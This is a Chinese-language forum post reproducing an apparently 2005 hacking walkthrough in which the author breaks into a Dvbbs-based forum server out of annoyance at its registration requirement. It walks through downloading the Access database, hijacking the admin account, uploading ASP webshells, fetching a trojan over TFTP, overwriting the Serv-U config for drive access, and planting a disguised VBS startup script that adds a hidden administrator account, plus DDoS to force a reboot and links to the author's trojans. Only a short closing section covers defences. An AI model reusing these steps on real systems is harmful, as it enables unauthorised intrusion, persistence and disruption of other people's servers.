QQ登录

只需要一步,快速开始

 注册地址  找回密码
查看: 3291|回复: 1
打印 上一主题 下一主题

通过asp木马配合serv-u取得管理员权限

[复制链接]
字体大小: 正常 放大
韩冰        

823

主题

3

听众

4048

积分

我的地盘我做主

该用户从未签到

发帖功臣 元老勋章

跳转到指定楼层
1#
发表于 2005-1-23 13:28 |只看该作者 |倒序浏览
|招呼Ta 关注Ta

编者:文章题目很简单.内容却比题目有趣多了,建议各位看看

7 P' _( _0 S5 r6 [1 h, p8 U& f3 e$ ~. `

作者:ALLEN QQ:515659

& B8 G4 U! V" Z1 M

今天心情不好,写一篇文章玩玩吧,利用网站的配置错误配合serv-u取得管理员权限,简单一点就是通过asp木马配合serv-u取得管理员权限,哈哈哈,是不是很cool阿! # T* A+ N' b3 ] w9 A F1 n ------------文章开始------------ 8 e- n3 w- ?8 ^, X 为了找仓木麻衣的mp3(这个小姑娘的歌很好听阿),把半个互联网都搜完了(太夸张了把),就是找不到,苦然眼镜一亮,哈哈哈×××论坛,看来人气不错,也有mp3的下载地址,那就去看看吧 $ c( z% w+ e+ t晕~~~~, * z8 B7 E# Z7 G3 L/ z! P4 Q5 x 论坛错误信息 % F: v, q L: N. Z9 n4 B+ N* f 产生错误的可能原因: ! u) K! D3 H, @( E* E* b( ~ 您是否仔细阅读了帮助文件,可能您还没有登陆或者不具有使用当前功能的权限。 8 U, l$ ^2 O5 \% T# K- V0 J 还要注册阿,可是论坛由于种种原因又不让注册 & x7 }7 [* }2 Y- K) |( Q气的我差点吐血! 4 |& e# R3 f) c6 K怎么办阿???唉,本想用溯雪破解几个密码。可是我们这个落后的地方上网贵,速度慢,有那个钱早就可以去买几张d版cd了,算了吧,想想别的办法把,打开我的xscan,随便扫了一下,服务器挺安全阿,只开了21,80,3389端口 , g6 C9 z2 U! U* W/ i/ L! N看来做了端口过滤 ; y5 C1 @8 Z( n* n$ Z8 ]没什么可利用的漏洞怎么办,不要着急,他用的是动网论坛,先试着下载他的数据库试试吧 , @/ a5 H2 X, e) Y6 ?) h 手动的找了一些,都不行 - ?8 i" k8 w/ s( ^0 `6 R5 Y9 k我先猜一下数据库在哪个目录里面,如果猜对的话下载数据库的成功率就比较高了 , `/ Z r" n7 B# ~9 \" x* s2 y _blank>http://aaa.com/data . X* z I3 [' E+ o_blank>http://aaa.com/database % z4 j+ c6 P( Y- p; R' _$ U_blank>http://aaa.com/db 4 s: }2 L& w. UHTTP 错误 404 - 找不到文件 3 [ ]8 { @# \7 n. U Internet 信息服务 + y: u$ B* B- Y, j5 K* X& F/ i9 \ 继续 2 L1 D) \% S1 W' U% d_blank>http://aaa.com/mdb 7 g8 w' n" u& V' z4 S- VHTTP 错误 403 - 禁止访问 " T/ W* l' i; y) ZInternet Explorer ' D! _# ?5 D" V+ s: w3 {0 k出现403错误就说明对方有这个目录,但是不允许浏览目录 4 Y& g$ n+ w* e2 u0 @7 J想想看mdb这个目录会是干什么的??哈哈十有八九十存放数据库的目录! " z4 g3 M; f9 c# O) o; c 把我以前些的添加的数据库地址文件载入xscan(专门下载数据库的地址),然后只扫描cgi漏洞 / K4 }/ }4 ^4 |( T+ Z/ P* s9 ^ scaning.......,大概10分钟过去了 ; T7 h$ y# H0 L8 n+ X$ T& g 扫描结果 v+ b7 `0 W0 @# s2 A1 }9 D8 r( S/mdb/lovemaik.asa [漏洞描述] ! K% \6 p. {" o; R- N. O/ N& _ 哈哈哈,成功的扫到了数据库,顺便告诉大家一个技巧" K0 i5 Y8 Y, H- i! w8 ]把一些常用的数据库地址如data.mdb,database.asp等等添加到xscan的cgi数据库中,或者单独作一个数据库,你可以用一些字典来生成数据库地址,这样的成功率很高的! 7 \0 s8 E7 N1 {* X L( R* A) c) |, Ixscan有一个好处就是可以直接扫域名,比如_blank>http://www.seeie.com 3 J! i3 U( b0 R5 f这样的话xscan就会帮你猜数据库地址 v% J1 J7 u% ^_blank>http://www.seeie.com/mdb/data.asp 1 i U6 q) z+ f! w* x" F _blank>http://www.seeie.com/mdb/db.mdb Q4 l6 G4 k: e( `7 f9 y* H% X ....... " a; c0 G% ?" g1 e好了,现在打开Net Transport(一种很爽的下载工具)把数据库down过来,用了50多分钟,终于下载完了 # N0 N& d. A5 _/ q% x在自己的机器上安装jmail和动网论坛,把下载的数据库覆盖新数据库并且把数据库扩展名改为.mdb,接着注册用户:allen,密码:123456 # D, |% q4 u( p8 L现在打开数据库,查看到我们刚才注册的用户allen的密码为49ba59abbe56e057(由于论坛使用md5不可逆算法加密,所以不能得到明文密码' `: W% C. E/ h) d9 l 好的把这一串数据复制一下,然后找到管理员的名字,也就是查找userclass表中数据为管理员的名字,把他的密码改成49ba59abbe56e057,记住在改密码之前一定要把他的密码(经过MD5加密过的)复制到一个记事本里,好了,我们用管理员的名字登陆,密码就是123456,接着我们就去修改管理员的资料,把回答问题和答案改掉!把email换成自己的,接着把刚才注册的用户allen提升为管理员,退出,在用allen帐号登陆,把原来的管理员降成普通用户,可能有些人会问这样做是为什么,原因是动网论坛不允许通过email取回管理员的密码,接着在打开数据库把原来管理员的密码给恢复了,在打开论坛,忘记密码-回答问题-取回密码,哈哈哈,快打开你的信箱把,密码已经发到你信箱了(注意,你的系统最好装jmail等邮件发送组件,要不然就会发不了邮件的) 4 i. }. M( F- P8 M* e( U 现在我们拿到了论坛管理员的密码了, ) V: y) ~. a- A7 f4 }3 K注意:以上步骤都是在本地操作的,其目的就是为了拿到论坛管理员密码( H) S6 I# y8 z/ }# C w现在登陆那个论坛-进入管理页面-论坛版面管理 -随便选一个讨论区-在上传文件类型中加上.asp,呵呵 ( o3 O( [' i% y9 U$ [% ?( c好了,进去这个讨论区发表帖子-上传文件,呵呵,把asp木马传上去 % i2 j8 \% K9 G; P. i% _/ J4 { 好了,可是这个文件被重命名了,唉,新亏手里还有一个免fso的木马,只有一个文件。传上去 - A7 b+ B8 `+ ]* r4 b9 u 可惜这个木马不好用,还是自己的木马用着顺手,于是tftp -i ***.***.***.*** GET use.asp ! t) f! k9 ~4 ^) l 好了,成功了,接这运行木马***.com/bbs/use.asp?id=1 n6 Q" C. D4 o5 u) h4 \7 p4 W7 f1 ]呵呵,服务器的东西清清楚楚的摆在我们面前了,上传一个winshell把 - r# V# M9 \2 d6 j- u, e! d+ ? 靠,服务器有病毒防火墙,看看是nav的,算了,自己加个壳吧,这样可以逃过防火墙9 B! m0 I: V8 E继续,传上去并执行。。。。没反应! # D$ E) W6 x, {4 G7 l2 m @ 先telnet ip 8210(我喜欢用noika手机的型号做为端口,)

zan
转播转播0 分享淘帖0 分享分享0 收藏收藏0 支持支持0 反对反对0 微信微信
韩冰        

823

主题

3

听众

4048

积分

我的地盘我做主

该用户从未签到

发帖功臣 元老勋章

靠,不行,差点忘了,对方做端口过滤了,怎么办阿,试试idq.dll(没报什么希望),果然对方的目录不可执行,在看一下对方有没有装perl,还是没有!在看看对方是什么分区格式,要是fat32那就好办了,试着删除c:\的任何文件都提示没有权限!说明对方是ntfs分区,唉,麻烦阿!!! 6 ~! a& P2 j, B0 W6 U本来想就此打住的时候突然发现了d:\Serv-U,于是我就想通过他来拿到权限 2 Y! Q+ R+ _2 n# M, S5 S 注:在此之前最好在自己的机器上装一个Serv-U, ) V4 ^+ x2 G! Y: q p" M 我们先看看ServUStartUpLog.txt 这里面有Serv-U的版本信息! ! {0 I' }) K; wSat 01Mar01 12:15:24 - Serv-U FTP Server v4.0 (4.1.0.0) - Copyright © 1995-2002 Cat 1 }+ ^0 \9 Z( u( z* o1 I, \ 。。。。。。。。。。 ; p2 T( }! d2 E4 C3 `版本挺新阿,呵呵 * B: s! m! r0 p3 K- C& @接着看看ServUDaemon.ini(用户配置文件) & B. ]) k" b& t! X* x( t哇考,里面的用户真多阿! . f6 d" b+ E5 i& W% I. E" P" ~ 接着我们把这个文件的内容复制一下,然后粘贴到本地serv-u的ServUDaemon.ini文件中,记住这时候最好停掉你的serv-u,保存文件,接着打开ServUAdmin.exe,重新添加一个用户,记住这个用户最好是管理员权限,必须对目录和文件可以进行读写可执行等一切操作,接着把用户主目录设为c:\ 0 E$ |3 d" m! ~, v' ~ 哈哈哈,到次为止大家都知道我的用意了把! 0 U1 t# K4 S3 J$ o* t) @ 把本地的ServUDaemon.ini的内容copy到对方服务器的ServUDaemon.ini中,然后保存! * m$ y& q' P; @4 j) S- u: T3 B& d 接这ftp上去 P6 {* U2 x& `! Y7 I& k 哈哈c盘的东西全部暴露了,现在我们对c盘有读写权限,可以进行任何操作(注意:serv-u的管理员权限和nt的管理员权限不是一样的,serv-u的管理员只能配置serv-u) # S% g: B% s( z+ @9 o- f由于对方做了端口过滤,办法不是很多,可以参考一篇修改注册表根改端口过滤的文章,是灰色轨迹论坛的一个网友写的,哈哈,在这里就不多说了! ' _, y# [3 L9 s C, o: o 我们先写一个vbs脚本,把这个脚本重命名为Adobe Gamma Loader.vbs,这样管理员不容易发现! ; D) d& `, F" @6 p% R2 q8 L+ k& R+ h 脚本内容: ) F+ Y7 c( T1 H$ R4 Q0 \ set wshshell=createobject ("wscript.shell" ) ( P4 \+ w8 d2 Z+ Da=wshshell.run ("cmd.exe /c net user allen ***** /add",0) ) s; Q0 V/ o5 U: k' q b=wshshell.run ("cmd.exe /c net localgroup Administrators allen /add",0) 4 J/ r: l: C9 S 大家都能看懂把,就是添加一个用户为allen密码为***的具有管理员权限的帐号,哈哈! : Q3 P8 c& V% W l# K2 B2 n 把这个脚本上传传到c:\Documents and Settings\All Users\「开始」菜单\程序\启动\ ; Q3 m8 L% f5 q% _6 E呵呵为什么要vbs脚本呢?原因很简单,就是不让管理员看见那个跳出来的黑黑的dos窗口。 9 b( [; r! S8 p3 [ n% E现在我们想办法让对方机器重启动! 4 B2 @; A" f% A) u用asp木马上传一个shutdown.exe 1 p6 D$ G5 W9 f. X 然后执行shutdown.exe 127.0.0.1 /r 8 a6 \% g, Z. Z' K- l哈哈,有时候可能不会成功,是权限的原因,具体。。。我也不太清楚。 - ?& \9 m$ N1 w4 k9 _/ l不过在nt or 2000上普通用户都可以重起机器 8 ^2 d* ]' c/ f, s& ?0 o 还有一个办法就是在你的机器上新建一个计划任务,内容就是定时重启动计算机,然后把他放到对方计划任务的目录下,如果对方没有开计划任务就不行了! ; }1 g- {2 v% w 如果还是成功不了你就用ddos把,哈哈,很暴力的让对方拒绝服务,接这就会重启(有可能是管理员操作的) 6 I: H7 T1 y2 R" i* ^0 @' B0 s' m x + b% B7 X2 a+ t1 I9 s# i$ e, o重启之后只要管理员登陆就可以添加一个帐号,哈哈 , z! g$ U8 _' U7 | 到此为止我已经拥有了管理员权限,呵呵 0 ]5 K3 L1 {2 V- S& @, z* S/ | % e. L& ^, @ E% ^1 W(关于端口过滤) * }# V$ a7 o/ T1 o/ R+ e 一般服务器至少会开21,80端口,像这种情况,即使有了管理员权限也没有多大用处! ! U+ ]' F+ @/ c8 g如果你可以得到一些bbs或者其他程序的管理员密码就比较好办了 $ Q5 d2 B* p( N% ^ 先传asp木马,然后用sc停掉ftp服务,接着弄一些后门来占用21端口 - E% b- s( d0 |! Y' d+ r- Y0 y" H或者干脆暴力的占用!不过这些办法在ntfs的分区上成功率并不高!经过实践我发现一般可以暴力占用80端口,前提是对方web服务器为iis!这样在你没有完全拿到管理员权限之前,对方的网站可能会一直瘫痪,哈哈! - W) w% y5 C. A" \1 a& ~* \3 H! O $ T# C1 r i) J7 j% a(关于access数据库的安全性) 6 A7 N i h7 S( _ 现在大部分网站都使用asp+access构建,这样的话通过下载access数据库简单就可以对网站进行破坏! % [# G. H: i8 S, |8 {; v 而很多的网站都不太重视这些,比如数据库文件名是data.mdb等 " ?0 j2 d, t* H: e2 A/ K而又有一部分人认为把数据库的扩展名改成.asp就万事大吉了, 0 Y, h$ o7 Q4 c5 U% [ 其实不然!大家可以做个试验 ,在自己的机器上把mdb改成asa或者asp 然后用任何一种下载工具下载,下载之后再把文件名改成.mdb 0 \( U, A/ y2 Y. S, e6 K3 b 文件照样可以用!道理很简单!iis只执行<% %>内的内容,而mdb文件单纯的修改扩展名只会让iis错误的以txt方式显示出来 % j% h/ @7 I! d 你可以看见,如果在浏览器执行***.asp(注意:这个是mdb数据库)就会看见一大堆乱码,和你用记事本打开看见的一样! 6 o; O0 _ m" ]6 F+ {0 [! ]/ ]防止数据库被下载的方法就有4种 8 y5 d! ]+ t1 t: Z8 o 1:在数据库新建一个表,表名为<%safe就可以了 ,这样iis在解析的时候会出现500错误,数据库也就下载不了了! 2 r& a) ?: ~8 `" ]- o, Y 2:在你的数据库文件名后门加上# (不是扩展名,比如name#.mdb)这样iis就以为你是在请求该目录中默认的文件名,比如index.asp,如果iis找不到就会发出403禁止浏览目录的错误警告! 0 ?) U, X7 a9 T( _* _! i& Y3:在iis中是把数据库所在的目录设为不可读,这样就可以防止被下载!请放心,这样做不会影响asp程序的正常使用!! & x C7 S& y$ x# A9 T( j5 _( h 4:直接使用数据源 (ODBC)这样数据库就可以不用在web目录里面,从而彻底防止被下载,但是这样做你必须拥有服务器的管理员权限,哈哈,大部分虚拟主机用户是不可能用数据源 (ODBC)的! . n- X+ z2 l) v -------------------------------------------------------------------------------- . q4 J6 J- F5 v/ M6 ^7 h 本文涉及到的asp木马可以在以下地址下载: $ F( C6 n' Z# O: `* D# p6 J_blank>http://www.seeie.com/download/door/aspmm.rar (本人写的,需要在木马后面加上?id=1的参数,比如_blank>http://aaa/com/use.asp?id=1) ( T- B# ]' M$ S* r, O _blank>http://www.seeie.com/download/door/nofso.rar (免fso的asp木马,很不错) 4 ]# C% i$ r/ F( B2 J& b" c; Z& t( T0 ?+ ` Homepage:seeie.com + p1 s2 {3 G* {" Z$ VEmail:raul666@163.com 0 R% p7 \, S6 J: O7 K i; J! V-----------------文章结束------------------------------
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册地址

qq
收缩
  • 电话咨询

  • 04714969085
fastpost

关于我们| 联系我们| 诚征英才| 对外合作| 产品服务| QQ

手机版|Archiver| |繁體中文 手机客户端  

蒙公网安备 15010502000194号

Powered by Discuz! X2.5   © 2001-2013 数学建模网-数学中国 ( 蒙ICP备14002410号-3 蒙BBS备-0002号 )     论坛法律顾问:王兆丰

GMT+8, 2026-4-19 14:21 , Processed in 0.513380 second(s), 57 queries .

回顶部